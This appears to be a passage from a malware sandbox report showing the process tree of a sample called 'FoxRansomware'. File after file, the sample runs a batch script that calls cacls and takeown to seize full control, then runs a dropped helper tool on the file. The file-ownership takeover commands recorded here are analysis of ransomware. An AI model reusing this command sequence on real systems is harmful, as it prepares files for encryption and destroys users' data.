C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:3512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:3948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:2752
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "background.png" -nobanner3⤵PID:3004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "background.png" -nobanner4⤵PID:776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:1292
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "tasks.xml" -nobanner3⤵PID:3368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "tasks.xml" -nobanner4⤵PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:600
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:2608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3612
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:2384
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:2040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:1440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:3860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:2412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:4988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "superbar.png" -nobanner3⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "superbar.png" -nobanner4⤵PID:2636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:4724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:3904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:1700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:4936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:2544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "license.html" -nobanner3⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "license.html" -nobanner4⤵PID:3888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:4600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:4088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:2244
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:4028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:1688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "forms_received.gif" -nobanner3⤵PID:2404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "forms_received.gif" -nobanner4⤵PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:2692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:4000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:4080
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:2604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵
- Modifies file permissions
PID:4568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "submission_history.gif" -nobanner3⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "submission_history.gif" -nobanner4⤵PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:4472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:1720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵PID:4456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "Identity-H" -nobanner3⤵PID:2884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "Identity-H" -nobanner4⤵PID:1432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:4048
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:1620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵PID:4556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:2760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:2240
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:4604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:2024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:4036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:1508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵
- Modifies file permissions
PID:1200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "brt32.clx" -nobanner3⤵PID:764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "brt32.clx" -nobanner4⤵PID:2356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:4132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:4772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:2904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "usa.fca" -nobanner3⤵PID:4672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "usa.fca" -nobanner4⤵PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:4288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵PID:4108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:1648
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:4356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:4244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:4208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵
- Modifies file permissions
PID:488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:4144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:3708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:4324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:1872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:4268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:4020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "create_form.gif" -nobanner3⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "create_form.gif" -nobanner4⤵PID:2300
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:3532
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:4424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:4364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "info.gif" -nobanner3⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "info.gif" -nobanner4⤵PID:4856
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:5036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:5040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵PID:4996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:3572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:2296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "trash.gif" -nobanner3⤵PID:596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "trash.gif" -nobanner4⤵PID:3844
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:2032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:3284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:5064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:4508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:4524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵PID:5088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:3664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:4468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵
- Modifies file permissions
PID:3432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:3256
-
